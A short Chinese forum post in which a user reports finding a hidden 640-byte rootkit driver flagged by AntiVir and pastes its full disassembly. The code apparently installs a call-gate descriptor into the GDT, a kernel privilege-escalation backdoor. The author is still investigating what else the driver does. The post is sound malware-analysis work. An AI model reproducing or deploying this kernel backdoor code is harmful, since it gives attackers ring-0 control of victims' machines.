前几日在我的机子上,发现了一个了隐藏的SYS文件,AntiVir报毒为RootKit,看了一下才发现原来它很苗条,只是640Bytes,很有秀惑力吧:
.text:00010200 .686p
.text:00010200 .mmx
.text:00010200 .model flat
.text:00010200
.text:00010200 ; 屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯?
.text:00010200
.text:00010200 ; Segment type: Pure code
.text:00010200 ; Segment permissions: Read/Execute
.text:00010200 _text segment para public 'CODE' use32
.text:00010200 assume cs:_text
.text:00010200 ;org 10200h
.text:00010200 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00010200
.text:00010200 ; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹?
.text:00010200
.text:00010200 ; Attributes: bp-based frame
.text:00010200
.text:00010200 public start
.text:00010200 start proc near
.text:00010200
.text:00010200 var_2A = qword ptr -2Ah
.text:00010200
.text:00010200 push ebp
.text:00010201 mov ebp, esp
.text:00010203 nop
.text:00010204 nop
.text:00010205 nop
.text:00010206 nop
.text:00010207 pushf
.text:00010208 pusha
.text:00010209 push edx
.text:0001020A sgdt [esp+28h+var_2A]
.text:0001020F pop edx
.text:00010210 mov eax, edx
.text:00010212 mov ecx, 3E0h
.text:00010217 mov byte ptr [edx], 0C3h
.text:0001021A mov [ecx+edx], ax
.text:0001021E shr eax, 10h
.text:00010221 mov [ecx+edx+6], ax
.text:00010226 mov dword ptr [ecx+edx+2], 0EC0003E8h
.text:0001022E mov dword ptr [ecx+edx+8], 0FFFFh
.text:00010236 mov dword ptr [ecx+edx+0Ch], 0CF9A00h
.text:0001023E popa
.text:0001023F popf
.text:00010240 mov eax, 0
.text:00010245 leave
.text:00010246 retn 8
.text:00010246 start endp
.text:00010246
.text:00010246 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00010249 align 20h
.text:00010249 _text ends
.text:00010249
.text:00010249
.text:00010249 end start
单从这段代码上来看,好像没有隐藏文件的功能,肯定还有其它的不干净东西,录找中.
发贴留个纪念